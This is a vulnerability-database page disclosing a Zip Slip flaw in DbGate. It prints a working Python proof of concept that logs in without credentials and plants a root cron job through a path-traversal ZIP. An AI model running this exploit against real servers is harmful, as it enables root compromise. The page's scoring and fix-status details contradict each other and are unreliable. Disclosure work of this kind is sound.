CVE-2026-47669

CRITICALPre-NVD 0.0
0.0
EchelonGraph verdictMonitorLow exploitation likelihood right now — keep watching.
  • No confirmed exploitation signals yet
CISA-KEV: Not listedEPSS: 0%CVSS: Exploit: NoneExposed: 0

No vendor fix yet — apply a workaround or compensating control (WAF / firewall / segmentation) and watch for a patch.

DbGate: Zip Slip in archive/unzip allows arbitrary file write leading to RCE

The unzipDirectory() function in packages/api/src/shell/unzipDirectory.js (line 27) does not validate that extracted file paths stay within the output directory. A malicious ZIP with ../ entries writes files anywhere on the filesystem.

In the default Docker deployment, DbGate runs as root and the none auth provider issues JWT tokens without credentials via POST /auth/login, so this is exploitable by any network-adjacent attacker.

Affected code:

packages/api/src/shell/unzipDirectory.js, line 27:

const destPath = path.join(outputDirectory, entry.fileName);
// No check that destPath stays within outputDirectory

Called from packages/api/src/controllers/archive.js, lines 291-293:

async unzip({ folder }) {
    const newFolder = await this.getNewArchiveFolder({ database: folder.slice(0, -4) });
    await unzipDirectory(path.join(archivedir(), folder), path.join(archivedir(), newFolder));

The archive controller also has zero permission checks and zero path traversal protection on any of its endpoints.

PoC:

import requests, zipfile, io

TARGET = "http://localhost:3000"

Get auth token (no credentials needed in default Docker)

r = requests.post(f"{TARGET}/api/auth/login", json={"amoid": "none"}) token = r.json()["accessToken"] hdrs = {"Authorization": f"Bearer {token}"}

Create malicious ZIP with path traversal

buf = io.BytesIO() with zipfile.ZipFile(buf, 'w') as zf: zf.writestr("../../../../../../etc/cron.d/dbgate-pwn", "* * * * * root id > /tmp/pwned\n") buf.seek(0)

Upload ZIP

r = requests.post(f"{TARGET}/api/uploads/upload", headers=hdrs, files={"data": ("evil.zip", buf, "application/zip")}) info = r.json()

Save to archive

requests.post(f"{TARGET}/api/archive/save-uploaded-zip", headers=hdrs, json={"filePath": info["filePath"], "fileName": "evil.zip"})

Trigger Zip Slip - writes cron job to /etc/cron.d/

requests.post(f"{TARGET}/api/archive/unzip", headers=hdrs, json={"folder": "evil.zip"}) print("Check /tmp/pwned after 1 minute")

Impact: Arbitrary file write as root -> RCE. Full container compromise in Docker deployments.

CVSS v3
EG Score
0.0(none)
EPSS
18.5%
KEV
Not listed

Published

June 5, 2026

Last Modified

June 5, 2026

Vendor Advisories for CVE-2026-47669(1)

These vendors published their own advisory mentioning this CVE — often with vendor-specific remediation steps + affected product lists not in NVD.

Affected Packages

(1 across 1 ecosystem)
npm(1)
PackageVulnerable rangeFixed inDependents
dbgate7.1.9

Frequently asked(4)

What is CVE-2026-47669?
CVE-2026-47669 is a critical vulnerability published on June 5, 2026. DbGate: Zip Slip in archive/unzip allows arbitrary file write leading to RCE The unzipDirectory() function in packages/api/src/shell/unzipDirectory.js (line 27) does not validate that extracted file paths stay within the output directory. A malicious ZIP with ../ entries writes files anywhere on…
When was CVE-2026-47669 disclosed?
CVE-2026-47669 was first published in the National Vulnerability Database on June 5, 2026. EchelonGraph re-ingests CVE updates from NVD on a 2-hour cycle, so this page reflects the latest published state.
Is CVE-2026-47669 actively exploited?
CVE-2026-47669 is not currently on CISA's Known Exploited Vulnerabilities catalog. FIRST EPSS estimates a 18.5% percentile likelihood of exploitation in the next 30 days — higher percentiles indicate greater predicted risk.
How do I remediate CVE-2026-47669?
Patch to the fixed version published by the affected vendor. Where vendor advisories exist for CVE-2026-47669, EchelonGraph cross-links them in the Vendor Advisories panel below — those typically contain the canonical remediation steps, fixed version numbers, and any vendor-specific mitigations.

Dependency Blast Radius

See which npm, PyPI, Go, and Maven packages are affected by CVE-2026-47669

Explore →

Is Your Infrastructure Affected by CVE-2026-47669?

EchelonGraph automatically scans your cloud infrastructure and maps CVE exposure using blast radius analysis.